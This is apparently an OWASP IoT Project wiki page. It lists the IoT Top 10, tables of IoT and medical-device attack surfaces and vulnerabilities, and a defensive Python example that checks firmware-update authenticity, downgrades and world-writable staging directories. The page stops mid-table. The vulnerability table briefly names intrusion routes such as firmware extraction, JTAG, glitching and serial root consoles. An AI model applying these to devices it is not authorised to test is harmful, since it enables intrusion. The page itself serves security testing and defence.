The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon this work, you distribute the resulting work only under the same or a similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the attacks known against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physical)<br />
* Damage (Physical)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that denies service to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software-based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* Connecting to an exposed serial console frequently gives a bootloader prompt or an unauthenticated root shell on the device.<br />
* Vendors sometimes lock down the bootloader so the attacker cannot drop into single-user mode, but such controls are often bypassable.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH daemons, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Weak or misused encryption (symmetric, asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across all devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* PII sent to third parties, even when encrypted in transit<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
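The checks behind the ''Update Mechanism'' rows above (update location writable, updates not signed or not verified, firmware downgrade) and the world-writable update storage item in the IoT vulnerabilities table, as an added Python example; this is not OWASP project code or any vendor's updater. It assumes an update made of an image plus a small JSON manifest and a per-device provisioned key; the docstring explains why HMAC stands in for a real signature here.<br />

```python
"""Update-mechanism checks for the "Update Mechanism" rows in the tables above
(world-writable update location, unverified/unauthenticated updates, firmware
downgrade).  Added example, not OWASP project code.

Assumptions (not from the page): the update is an image plus a small JSON
manifest {"version", "sha256"}.  The standard library has no public-key
signature primitive, so the manifest is authenticated with HMAC-SHA256 under a
per-device provisioned key.  A production design should sign the manifest with
an asymmetric key (e.g. Ed25519) so the device holds no secret able to forge
updates; the verification order below is the same either way."""
import hashlib
import hmac
import json
import os
import stat
import tempfile


class UpdateRejected(Exception):
    """Raised when an update must not be applied."""


def staging_dir_is_world_writable(path):
    """True when 'other' may write to the update location (mode 0777, 01777, ...)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def parse_version(version):
    """'1.2.10' -> (1, 2, 10): compare numerically, never as strings."""
    return tuple(int(part) for part in version.split("."))


def make_update(device_key, version, image):
    """Vendor side (constructed): build the manifest and its authentication tag."""
    manifest = json.dumps(
        {"version": version, "sha256": hashlib.sha256(image).hexdigest()},
        sort_keys=True).encode()
    tag = hmac.new(device_key, manifest, hashlib.sha256).hexdigest()
    return manifest, tag


def verify_update(manifest_bytes, tag, image, device_key, installed_version):
    """Device side: return the manifest if the update may be applied.

    1. authenticate the manifest before parsing anything from it;
    2. refuse downgrades and re-installs (anti-rollback);
    3. bind the image to the authenticated manifest via its hash."""
    expected = hmac.new(device_key, manifest_bytes, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        raise UpdateRejected("manifest authentication failed")
    manifest = json.loads(manifest_bytes)
    if parse_version(manifest["version"]) <= parse_version(installed_version):
        raise UpdateRejected("downgrade refused: %s <= %s"
                             % (manifest["version"], installed_version))
    if not hmac.compare_digest(hashlib.sha256(image).hexdigest(), manifest["sha256"]):
        raise UpdateRejected("image hash does not match manifest")
    return manifest


def demo():
    """Exercise the checks on constructed data; returns a dict of outcomes."""
    key = b"constructed-per-device-key"
    image = b"\x7fELF constructed firmware image"
    manifest, tag = make_update(key, "2.0.1", image)
    results = {"valid": verify_update(manifest, tag, image, key, "2.0.0")["version"]}
    cases = {
        "tampered_image": (manifest, tag, image + b"\x00", key, "2.0.0"),
        "tampered_manifest": (manifest.replace(b"2.0.1", b"9.9.9"), tag, image, key, "2.0.0"),
        "downgrade": (manifest, tag, image, key, "2.1.0"),
    }
    for name, args in cases.items():
        try:
            verify_update(*args)
            results[name] = "accepted"
        except UpdateRejected as exc:
            results[name] = "rejected: " + str(exc)
    staging = tempfile.mkdtemp()
    os.chmod(staging, 0o1777)          # the misconfiguration: anyone can drop a file
    results["world_writable"] = staging_dir_is_world_writable(staging)
    os.chmod(staging, 0o700)           # corrected: only the updater may write
    results["fixed"] = staging_dir_is_world_writable(staging)
    os.rmdir(staging)
    return results


if __name__ == "__main__":
    for outcome, value in demo().items():
        print(outcome, "->", value)
```

The order inside verify_update is the point: a manifest that has not been authenticated must not drive a version comparison or a hash lookup, and the version check has to happen before any image is written to flash, otherwise a world-writable staging directory lets anyone stage an old, vulnerable but genuine image for reinstallation.<br />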
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
